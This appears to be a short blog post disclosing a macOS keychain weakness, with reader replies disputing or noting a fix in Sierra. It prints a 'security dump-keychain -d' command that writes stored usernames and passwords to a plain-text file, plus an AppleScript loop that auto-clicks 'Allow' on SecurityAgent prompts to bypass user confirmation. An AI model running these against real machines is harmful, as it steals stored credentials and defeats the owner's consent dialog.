This Security Flaw Can Display All Keychain Passwords in Plain Text

Just a few days ago, a client of mine has learned the hard way to not let a scam company take control of your computer to provide you support. What I have learned out of this experience has shocked me to the core of my being.

There is a method in OS X that allows people to export the keychain without sudo privileges or system dialogs. This will put it in a text file with the username and password being displayed in plain text.

As of writing of this small article, it is currently working on 10.10 and 10.11.5.

The command follows:

security dump-keychain -d login.keychain > keychain.txt

The way around system dialogs, by adding:

tell application "System Events"
    repeat while exists (processes where name is "SecurityAgent")
        tell process "SecurityAgent"
            click button "Allow" of group 1 of window 1
        end tell
        delay 0.2
    end repeat
end tell

All unauthorized users can gain access to all usernames and passwords that were ever stored in the keychain and iCloud.

Apple is known for priding itself on their level of security, but this has been a known method for over two years now. I can strongly say that this is a major security flaw — they should at least force people to confirm their password. The Keychain dialogue requires you to enter your password when you want to show password for an entry.

Shouldn’t a command within the terminal require the same levels of security?


Categories: Security

Tags: , , , , ,

3 replies

  1. This flaw seems to be fixed in MacOS Sierra.


  2. Not a security flaw. This is how it’s supposed to work. The keychain is left unlocked (i.e. no password required each time) for convenience of the user.



  1. This Security Flaw Can Display All Keychain Passwords in Plain Text – Technology and Computing
%d bloggers like this: